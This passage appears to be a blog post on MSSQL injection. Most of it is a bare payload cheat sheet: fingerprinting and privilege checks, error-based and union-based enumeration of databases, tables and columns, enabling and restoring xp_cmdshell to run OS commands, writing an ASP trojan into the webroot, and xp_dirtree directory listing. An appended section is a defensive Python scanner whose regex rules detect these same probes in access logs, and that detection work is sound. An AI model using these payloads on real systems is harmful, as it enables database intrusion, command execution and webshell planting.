MSSQL Database Security

1. MSSQL injection

1) Key system tables in master

master.dbo.sysdatabases
key fields: name (database name), dbid (database ID)
master.dbo.sysobjects
key fields: name (object name), id (object ID), uid (owner user ID), status (object status), xtype (object type)
master.dbo.syscolumns
key fields: name (column name), id (table ID), colid (column ID)

2) Manual inspection

Confirm the injection point is MSSQL: and exists (select * from sysobjects)
Determine privileges: select is_srvrolemember('sysadmin' / 'db_owner' / 'public')
Information gathering:
Database version: and @@version > 0
Test for stacked (multi-statement) query support: declare @d int
Test for subquery support: and (select count(1) from [sysobjects]) >= 0
Current database user name: and user > 0
Current database name: and 1=convert(int, db_name()) or and 1=(select db_name())
Local server name: and 1=(select @@servername)
Whether the current user can read master: and 1=(select has_dbaccess('master'))
Table and column names from group by / having error messages: group by <column> having 1=1--
Order by error-based injection: http://blog.nsfocus.net/mssql-order-by/
Query all database names: and 1=(select name from master.dbo.sysdatabases where dbid=1)--
Query all tables in the current database: and (select top 1 name from (select top n name from sysobjects where xtype=0x75 order by name) t order by name desc)=0
Query column names: and (select col_name(object_id('<table>'), n))=0
Query column values: and (select top 1 <column> from <table>)>0 and (select top 1 <column> from <table> where <column> <> '<value1>')>0
Union select injection
Match the column count: and 1=2 union all select null, null, null from <table>
Data type mismatch: and 1=2 union all select 'a', null, null from <table>
Query all database names: (select name from master.dbo.sysdatabases where dbid=1)
Query all tables in the database: (select top 1 name from (select top n name from sysobjects where xtype=0x75 order by name) t order by name desc)
Query column names: (select col_name(object_id('<table>'), n))
Query column values: (select top 1 <column> from <table>) then (select top 1 <column> from <table> where <column> <> '<value1>')

2. Injection attacks using MSSQL extended stored procedures

1) Check whether the extended stored procedures exist

xp_cmdshell: select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
xp_regread: select count(*) from master.dbo.sysobjects where name='xp_regread'

2) Enable the extended stored procedure

exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'xp_cmdshell', 1;
reconfigure;

3) Restore the extended stored procedure

Drop the existing xp_cmdshell: ;exec master..sp_dropextendedproc 'xp_cmdshell'
Re-create xp_cmdshell: ;exec master..sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'

4) Attacks with extended stored procedures under sa permissions:

Execute arbitrary commands with xp_cmdshell: ;exec master..xp_cmdshell 'whoami'
xp_regwrite: write to the registry and enable sandbox mode
Write a one-line ASP trojan with sp_makewebtask: ;exec sp_makewebtask 'c:\inetpub\wwwroot\cimer.asp'; select 'evil.file'--

5) Attacks with extended stored procedures under db_owner permissions:

Check whether the user has db_owner rights in the database: and 1=(select is_member('db_owner'));--
Create a table: ;create table temp (dir nvarchar(255), depth varchar(255), files varchar(255), id int not null identity(1,1));--
Run the xp_dirtree extended procedure into it: ;insert into temp (dir, depth, files) exec master.dbo.xp_dirtree 'c:', 1, 1--
Read the table contents: and (select dir from temp where id=1)>0
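A defender-side example added here, not part of the original post: a small Python scanner that flags web-server access log lines whose query strings carry the probes listed in sections 1 and 2 (sysobjects existence checks, role and version probes, convert(int, ...) error-based queries, union select, and stacked exec of sp_configure / xp_cmdshell / xp_dirtree). The log lines, client addresses and paths are constructed samples.

```python
"""Scan web-server access log lines for the MSSQL injection probes listed above.
All log lines, addresses and paths below are constructed samples."""
import re
from urllib.parse import unquote_plus

# One rule per stage of the technique; patterns mirror the page's payloads.
RULES = [
    ("fingerprint", r"\bexists\s*\(\s*select\b.*\bsysobjects\b|@@version"
                    r"|\bis_srvrolemember\s*\(|\bhas_dbaccess\s*\("),
    ("error_based", r"\bconvert\s*\(\s*int\s*,|\bhaving\s+1\s*=\s*1"
                    r"|\bcol_name\s*\(\s*object_id\s*\("),
    ("schema_enum", r"\bsysdatabases\b|\bsysobjects\b.*\bxtype\s*=|\bsyscolumns\b"),
    ("union", r"\bunion\s+(all\s+)?select\b"),
    ("stacked_xproc", r";\s*exec(ute)?\b|\bsp_configure\b|\bxp_cmdshell\b"
                      r"|\bxp_reg(read|write)\b|\bxp_dirtree\b|\bsp_makewebtask\b"
                      r"|\bsp_(add|drop)extendedproc\b"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]

# Common Log Format: client, identity, user, [timestamp], "METHOD path proto", status
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                      r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def classify(raw_query: str) -> list[str]:
    """Return the stage names matched in a query string. Decoding twice also
    catches double-encoded payloads (e.g. %2527 -> %27 -> ')."""
    decoded = unquote_plus(unquote_plus(raw_query))
    return [name for name, rx in COMPILED if rx.search(decoded)]

def scan(lines):
    """Yield (client_ip, path, stages) for every request hitting at least one rule."""
    for line in lines:
        m = LOG_LINE.match(line)
        if m and (stages := classify(m["path"])):
            yield m["ip"], m["path"], stages

SAMPLE_LOG = [  # constructed sample lines
    '203.0.113.5 - - [10/Feb/2020:12:00:01 +0800] "GET /news.asp?id=12 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Feb/2020:12:00:03 +0800] "GET /news.asp?id=12%20and%20exists(select%20*%20from%20sysobjects) HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Feb/2020:12:00:05 +0800] "GET /news.asp?id=12%20and%201=convert(int,db_name()) HTTP/1.1" 500 311',
    '203.0.113.5 - - [10/Feb/2020:12:00:09 +0800] "GET /news.asp?id=12;exec%20sp_configure%20%27xp_cmdshell%27,1-- HTTP/1.1" 500 311',
    '198.51.100.7 - - [10/Feb/2020:12:01:00 +0800] "GET /search.asp?q=union+station HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, path, stages in scan(SAMPLE_LOG):
        print(f"{ip} {','.join(stages):14} {path}")
```

The benign "union station" request shows why the rules key on full constructs (union ... select, convert(int, ...)) rather than single keywords; a 500 status paired with an error_based or stacked_xproc hit is the pattern worth alerting on first.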


Source: www.cnblogs.com/TAiiiHu/p/12319318.html